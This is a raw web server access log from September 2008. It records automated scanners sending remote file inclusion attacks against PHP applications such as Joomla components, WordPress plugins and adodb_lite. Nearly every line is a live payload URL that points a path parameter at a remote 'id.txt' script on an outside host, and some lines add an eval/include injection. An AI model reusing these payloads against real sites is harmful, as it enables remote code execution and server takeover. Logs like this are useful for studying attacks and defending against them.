62.141.56.36 - - [12/Sep/2008:10:23:06 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:23:11 -0700] "GET /error.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:10:23:13 -0700] "GET /logs//accounts.php?command=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:10:23:13 -0700] "GET //accounts.php?command=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:23:26 -0700] "GET /logs/access_080401.log/main.php?appserv_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:23:26 -0700] "GET /main.php?appserv_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:23:30 -0700] "GET /logs/main.php?appserv_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:23:58 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:23:59 -0700] "GET /phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.115.228.131 - - [12/Sep/2008:10:24:00 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:24:00 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.115.228.131 - - [12/Sep/2008:10:24:00 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:24:07 -0700] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:24:08 -0700] "GET /help.php?css_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:24:10 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 200 89433 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:24:15 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.115.228.131 - - [12/Sep/2008:10:24:25 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.115.228.131 - - [12/Sep/2008:10:24:25 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:24:55 -0700] "GET /logs/access_080319.log/template.php?CONFIG[main_path]=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:25:01 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:25:10 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:25:10 -0700] "GET /errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:25:11 -0700] "GET /logs/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:25:20 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:25:20 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:25:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:25:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:25:21 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:25:21 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:10:25:23 -0700] "GET /SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:10:25:23 -0700] "GET /logs/access_080508.log/SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:10:25:23 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:25:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:25:28 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:25:28 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:25:28 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:25:28 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:25:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:25:28 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:25:29 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.61.244.6 - - [12/Sep/2008:10:25:34 -0700] "GET /logs/access_080617.log//tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:25:38 -0700] "GET /logs/access_080508.log/lib/gore.php?libpath=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:25:38 -0700] "GET /lib/gore.php?libpath=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:25:38 -0700] "GET /logs/lib/gore.php?libpath=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:26:00 -0700] "GET /logs/access_080505.log/main.php?appserv_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:26:06 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:26:20 -0700] "GET /logs/access_080617.log//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:26:42 -0700] "GET /logs/access_080830.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:26:42 -0700] "GET /logs/access_080830.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:26:42 -0700] "GET /logs/access_080830.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.177.86.197 - - [12/Sep/2008:10:26:45 -0700] "GET /index.php?option=com_frontpage&Itemid=1&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89449 "-" "libwww-perl/5.65" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:26:58 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:27:03 -0700] "GET /logs/access_080404.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:27:03 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:27:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:10:27:18 -0700] "GET /logs/access_071214.log///?_zb_path=http://www.jisu.ms.kr/data/info??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:10:27:19 -0700] "GET ///?_zb_path=http://www.jisu.ms.kr/data/info??? HTTP/1.1" 200 89063 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:10:27:21 -0700] "GET /logs///?_zb_path=http://www.jisu.ms.kr/data/info??? HTTP/1.1" 200 64722 "-" "libwww-perl/5.803" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:27:28 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [12/Sep/2008:10:27:28 -0700] "GET /logs/lib/gore.php?libpath=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [12/Sep/2008:10:27:29 -0700] "GET /lib/gore.php?libpath=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:27:34 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:27:35 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:27:55 -0700] "GET /logs/access_071214.log//?_zb_path=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:27:55 -0700] "GET /logs//?_zb_path=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 200 64721 "-" "Mozilla/5.0" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:27:59 -0700] "GET /logs/access_080321.log/help.php?css_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:28:00 -0700] "GET /help.php?css_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:28:00 -0700] "GET /logs/help.php?css_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:28:05 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:28:14 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:28:15 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:28:18 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:28:23 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:28:26 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:28:27 -0700] "GET /errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:28:34 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:28:35 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:28:38 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:28:39 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:28:40 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:28:42 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:28:51 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:28:52 -0700] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:28:53 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:29:01 -0700] "GET /phphtml.php?htmlclass_path=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:29:01 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:29:07 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:29:16 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:29:21 -0700] "GET /logs/access_080516.log//config/dbutil.bck.php?confdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:29:21 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:29:21 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:29:21 -0700] "GET //config/dbutil.bck.php?confdir=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:29:29 -0700] "GET /logs/access_080731.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:29:29 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:29:30 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:29:36 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:29:38 -0700] "GET /logs/access_080714.log//dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:29:38 -0700] "GET /logs/access_080714.log//dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:29:46 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:29:46 -0700] "GET /logs/access_080714.log//dotproject//includes/db_connect.php?baseDir=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:29:47 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:29:50 -0700] "GET /logs/access_080331.log//?_zb_path=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:29:50 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:30:02 -0700] "GET /logs/access_080626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.48.60 - - [12/Sep/2008:10:30:30 -0700] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cbmarketer.com/images/t_pane.jpg/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.48.60 - - [12/Sep/2008:10:30:30 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cbmarketer.com/images/t_pane.jpg/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.48.60 - - [12/Sep/2008:10:30:30 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cbmarketer.com/images/t_pane.jpg/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:30:45 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:30:45 -0700] "GET /phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:30:45 -0700] "GET /logs/access_080331.log//include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:30:47 -0700] "GET /logs/access_080331.log//include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:30:57 -0700] "GET /logs/access_080626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:30:59 -0700] "GET /logs/access_080517.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:31:00 -0700] "GET /logs/access_080801.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:31:02 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:31:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.48.60 - - [12/Sep/2008:10:31:09 -0700] "GET /logs/access_080412.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cbmarketer.com/images/t_pane.jpg/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:10:31:12 -0700] "GET /logs/access_080820.log/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
